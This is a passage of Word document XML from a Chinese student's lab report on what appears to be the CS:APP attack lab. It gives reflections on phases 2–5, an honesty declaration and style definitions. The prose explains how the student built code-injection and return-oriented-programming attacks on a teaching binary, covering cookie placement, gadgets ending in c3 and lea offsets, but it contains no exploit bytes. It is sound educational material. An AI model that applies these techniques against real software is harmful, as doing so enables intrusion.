        <w:t>五、总结体会</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1、在进行phase2时，传递cookie时没有添加$符号，导致传递的不是立即数，代码出错，进行仔细比对后发现问题并改正。</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2、在phase3中储存cookie时，刚开始想随便找一个地址应该就可以运行，于是找到了main函数的地址，而非栈内空间，导致发生段错误，后经尝试，将cookie存进了test函数的栈顶地址,解决问题。</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3、做phase5时遇到的问题最多，由于phase5要求调用touch3，所以需要想办法把cookie的ascii码传进去，在phase3中我采用了movl的办法分两次将cookie传进相应地址，在phase5中却没有对立即数直接进行操作的指令，同时栈的地址也不是固定的，后发现有lea操作，同时意识到可以直接将cookie的值写入缓冲区，利用lea来确定其地址，在执行该过程中，需要通过各种mov操作来将偏移量移到%rsi寄存器中，在寻找这些操作时，只顾着寻找编码相同的操作，却忽视了若没有c3结尾，则计算机会一直沿着这条指令往下继续执行其他指令直到c3返回为止，因此在传输偏移量时找到的mov指令全部都是错误指令，最后用到的小工具也只有7个，发生段错误。在改正指令后，对于cookie的存放位置也有错误，之前为图方便直接把cookie的值放到了所有代码的第一行，这样偏移量即为0x8，此处便出现了两个错误，第一，cookie放到所有代码前面会导致计算机将其也识别为一个操作而非ascii码，第二，当执行一条操作语句时，%rsp会移向下一条操作语句，所以当计算机执行movq %rsp, %rax时，%rsp指向的是下一条语句，存进%rax的地址也是下一条语句的地址，因此偏移量的计算要从下一条语句开始才可以。为了纠正错误，我把cookie放到了最后，这样计算机在跳转到touch3后就会结束，不会执行cookie，第二，我根据cookie的位置重新计算量偏移量，总共有十一条语句，除去第一条还剩十条，偏移量为0x48。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia"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本次实验大概花费了10小时，其中小半时间用在了阅读文档上面，文档提供的信息非常关键，如果不仔细阅读，很容易忽视一些重要细节和题目要求，当失败时，我会再去通篇阅读一下实验说明以寻找关键信息来检查自己代码是否符合规范，剩下的时间中又有一半用来做phase5，因为其要求同phase3，而phase4的解决过程相对来说并不复杂，于是便想挑战一下phase5，在phase5中我也发现很多认识上的错误，对汇编语言有了更深刻的理解。五个Phase的难度是层层递进的，Part 1让我对部分汇编指令以及栈的原理有了更深的领悟，Part 2让我学习到了跳转拼接的相关知识，实现成功的攻击需要对每一个字节都能有足够的仔细认真。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>意见和建议：本次实验文档均为英文，阅读难度较大，同时HEX2RAW文件的用法在文档的最后，导致刚开始做时手无足措，不知道如何使用，希望可以适当中文化同时微调一下内容，把相关使用方法移到前面。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="560" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>六、诚信声明（不签扣10分）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:highlight w:val="red"/>
        </w:rPr>
        <w:t>需要填写如下声明，并在底部给出手写签名的电子版。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在完成本次实验过程中，我曾分别与以下各位同学就以下方面做过交流：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来自高天涛同学提醒的细节：计算偏移量时要注意%rsp已经往地址增大方向移动了一条语句。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="default" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>来自王骊琨同学的提醒：语句的结尾需要为c3，否则不会停止，会一直往下执行</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="480" w:firstLineChars="200"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>此外，我还参考了以下资料：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="begin"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:instrText xml:space="preserve"> HYPERLINK "https://blog.csdn.net/m0_65159351/article/details/128642734" </w:instrText>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="10"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>https://blog.csdn.net/m0_65159351/article/details/128642734</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:t>了解ret指令返回操作。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="420" w:firstLineChars="0"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>在我提交的程序中，还在对应的位置以注释形式记录了具体的参考内容。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我独立完成了本次实验除以上方面之外的所有工作，包括分析、设计、编码、调试与测试。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我清楚地知道，从以上方面获得的信息在一定程度上降低了实验的难度，可能影响起评分。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我从未使用他人代码，不管是原封不动地复制，还是经过某些等价转换。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我未曾也不会向同一课程（包括此后各届）的同学复制或公开我这份程序的代码，我有义务妥善保管好它们。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我编写这个程序无意于破坏或妨碍任何计算机系统的正常运行。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>我清楚地知道，以上情况均为本课程纪律所禁止，若违反，对应的实验成绩将按照0分计。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251661312" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="column">
              <wp:posOffset>3991610</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>-387350</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="1005205" cy="1949450"/>
            <wp:effectExtent l="0" t="0" r="6350" b="10795"/>
            <wp:wrapSquare wrapText="bothSides"/>
            <wp:docPr id="25" name="图片 25" descr="96f716ce4dc60d03f769f7f38395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6f716ce4dc60d03f769f7f38395ded"/>
                    <pic:cNvPicPr>
                      <a:picLocks noChangeAspect="1"/>
                    </pic:cNvPicPr>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId32"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm rot="16200000">
                      <a:off x="0" y="0"/>
                      <a:ext cx="1005205" cy="1949450"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:anchor>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="3780" w:firstLine="420"/>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:lang w:eastAsia="zh-CN"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="14"/>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>（签名）</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:firstLine="420" w:firstLineChars="200"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:szCs w:val="21"/>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IDFont+F2">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="CIDFont+F4">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>
    <w:pitch w:val="default"/>
    <w:sig w:usb0="00000000" w:usb1="00000000" w:usb2="00000000" w:usb3="00000000" w:csb0="00000000" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="CIDFont+F6">
    <w:altName w:val="Times New Roman"/>
    <w:panose1 w:val="00000000000000000000"/>
    <w:charset w:val="00"/>
    <w:family w:val="roman"/>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17BAFC"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="CB17BAFC"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="1">
    <w:nsid w:val="0CE25FA2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="0CE25FA2"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="2"/>
      <w:numFmt w:val="japaneseCounting"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="570" w:hanging="57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4EA1A2E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="44EA1A2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1B34F4C"/>
    <w:multiLevelType w:val="singleLevel"/>
    <w:tmpl w:val="51B34F4C"/>
    <w:lvl w:ilvl="0" w:tentative="0">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:suff w:val="nothing"/>
      <w:lvlText w:val="%1、"/>
      <w:lvlJc w:val="left"/>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RlYjhkNjc0ODc1YzEzZjYwNTFhYjJlYzY4YTVkYTQifQ=="/>
  </w:docVars>
  <w:rsids>
    <w:rsidRoot w:val="00CB7B7B"/>
    <w:rsid w:val="000369B2"/>
    <w:rsid w:val="00047276"/>
    <w:rsid w:val="00095C11"/>
    <w:rsid w:val="000A41DF"/>
    <w:rsid w:val="000B4C13"/>
    <w:rsid w:val="000B7147"/>
    <w:rsid w:val="000D7FB7"/>
    <w:rsid w:val="00110DE5"/>
    <w:rsid w:val="00137D36"/>
    <w:rsid w:val="001A67FD"/>
    <w:rsid w:val="002162F0"/>
    <w:rsid w:val="002660FB"/>
    <w:rsid w:val="002A24DA"/>
    <w:rsid w:val="002C245B"/>
    <w:rsid w:val="003143C8"/>
    <w:rsid w:val="00324BDA"/>
    <w:rsid w:val="003462FD"/>
    <w:rsid w:val="003577D8"/>
    <w:rsid w:val="003710B3"/>
    <w:rsid w:val="003D3259"/>
    <w:rsid w:val="003D46BF"/>
    <w:rsid w:val="003E01B8"/>
    <w:rsid w:val="0047777A"/>
    <w:rsid w:val="004E1FE7"/>
    <w:rsid w:val="005A66EB"/>
    <w:rsid w:val="00601531"/>
    <w:rsid w:val="0068629E"/>
    <w:rsid w:val="006B15EF"/>
    <w:rsid w:val="006C03F0"/>
    <w:rsid w:val="006D304E"/>
    <w:rsid w:val="007545A1"/>
    <w:rsid w:val="00767B92"/>
    <w:rsid w:val="007A4678"/>
    <w:rsid w:val="007E74FF"/>
    <w:rsid w:val="008B73D9"/>
    <w:rsid w:val="008E243D"/>
    <w:rsid w:val="008F38C2"/>
    <w:rsid w:val="00932E81"/>
    <w:rsid w:val="009974E5"/>
    <w:rsid w:val="009C4837"/>
    <w:rsid w:val="00A17EFA"/>
    <w:rsid w:val="00A33B69"/>
    <w:rsid w:val="00A72776"/>
    <w:rsid w:val="00AD18E9"/>
    <w:rsid w:val="00B56BD4"/>
    <w:rsid w:val="00BA789C"/>
    <w:rsid w:val="00BB66A4"/>
    <w:rsid w:val="00C129F7"/>
    <w:rsid w:val="00C16DF3"/>
    <w:rsid w:val="00C716C3"/>
    <w:rsid w:val="00C8108F"/>
    <w:rsid w:val="00CB7B7B"/>
    <w:rsid w:val="00D83B62"/>
    <w:rsid w:val="00D8402F"/>
    <w:rsid w:val="00DC4675"/>
    <w:rsid w:val="00DD1AD8"/>
    <w:rsid w:val="00E06129"/>
    <w:rsid w:val="00E27F7B"/>
    <w:rsid w:val="00EA1295"/>
    <w:rsid w:val="00EC5FE4"/>
    <w:rsid w:val="00ED3F6B"/>
    <w:rsid w:val="00F00402"/>
    <w:rsid w:val="00F71F8F"/>
    <w:rsid w:val="00F86C7D"/>
    <w:rsid w:val="02505F50"/>
    <w:rsid w:val="092D496A"/>
    <w:rsid w:val="17D313A3"/>
    <w:rsid w:val="1B1D3B62"/>
    <w:rsid w:val="20085DEC"/>
    <w:rsid w:val="2155529A"/>
    <w:rsid w:val="32662906"/>
    <w:rsid w:val="33437DE0"/>
    <w:rsid w:val="346E5094"/>
    <w:rsid w:val="35BB35B3"/>
    <w:rsid w:val="3A550091"/>
    <w:rsid w:val="3AEE3DB8"/>
    <w:rsid w:val="3D2E292D"/>
    <w:rsid w:val="44CD3F38"/>
    <w:rsid w:val="484653A1"/>
    <w:rsid w:val="4990782C"/>
    <w:rsid w:val="4CDB131E"/>
    <w:rsid w:val="59E470D5"/>
    <w:rsid w:val="61AD24F6"/>
    <w:rsid w:val="68DE1099"/>
    <w:rsid w:val="692B3716"/>
    <w:rsid w:val="6E130B08"/>
    <w:rsid w:val="6F932528"/>
    <w:rsid w:val="70B13D3F"/>
    <w:rsid w:val="78D057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8"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4153"/>
        <w:tab w:val="right" w:pos="8306"/>
      </w:tabs>
      <w:snapToGrid w:val="0"/>
      <w:jc w:val="left"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="3">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5">
    <w:name w:val="Title"/>
    <w:basedOn w:val="1"/>
    <w:next w:val="1"/>
    <w:link w:val="19"/>
    <w:qFormat/>
    <w:uiPriority w:val="10"/>
    <w:pPr>
      <w:spacing w:before="240" w:after="60"/>
      <w:jc w:val="center"/>
      <w:outlineLvl w:val="0"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:eastAsia="宋体" w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorBidi"/>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="32"/>
      <w:szCs w:val="32"/>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FollowedHyperlink"/>
    <w:basedOn w:val="8"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="954F72" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="folHlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="10">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="8"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:color w:val="0563C1" w:themeColor="hyperlink"/>
      <w:u w:val="single"/>
      <w14:textFill>
        <w14:solidFill>
          <w14:schemeClr w14:val="hlink"/>
        </w14:solidFill>
      </w14:textFill>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="11">
    <w:name w:val="HTML Code"/>
    <w:basedOn w:val="8"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:rFonts w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体" w:cs="宋体"/>
      <w:sz w:val="24"/>
      <w:szCs w:val="24"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="12">
    <w:name w:val="fontstyle01"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F2" w:hAnsi="CIDFont+F2"/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="13">
    <w:name w:val="fontstyle11"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F4" w:hAnsi="CIDFont+F4"/>
      <w:b/>
      <w:bCs/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="14">
    <w:name w:val="fontstyle21"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
    <w:rPr>
      <w:rFonts w:hint="default" w:ascii="CIDFont+F6" w:hAnsi="CIDFont+F6"/>
      <w:color w:val="000000"/>
      <w:sz w:val="44"/>
      <w:szCs w:val="44"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="15">
    <w:name w:val="List Paragraph"/>
    <w:basedOn w:val="1"/>
    <w:qFormat/>
    <w:uiPriority w:val="34"/>
    <w:pPr>
      <w:ind w:firstLine="420" w:firstLineChars="200"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="16">
    <w:name w:val="comment"/>
    <w:basedOn w:val="8"/>
    <w:qFormat/>
    <w:uiPriority w:val="0"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="17">
    <w:name w:val="页眉 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="3"/>
    <w:qFormat/>
    <w:uiPriority w:val="99"/>
    <w:rPr>
      <w:sz w:val="18"/>
      <w:szCs w:val="18"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="18">
    <w:name w:val="页脚 字符"/>
    <w:basedOn w:val="8"/>
    <w:link w:val="2"/>
    <w:qFormat/>
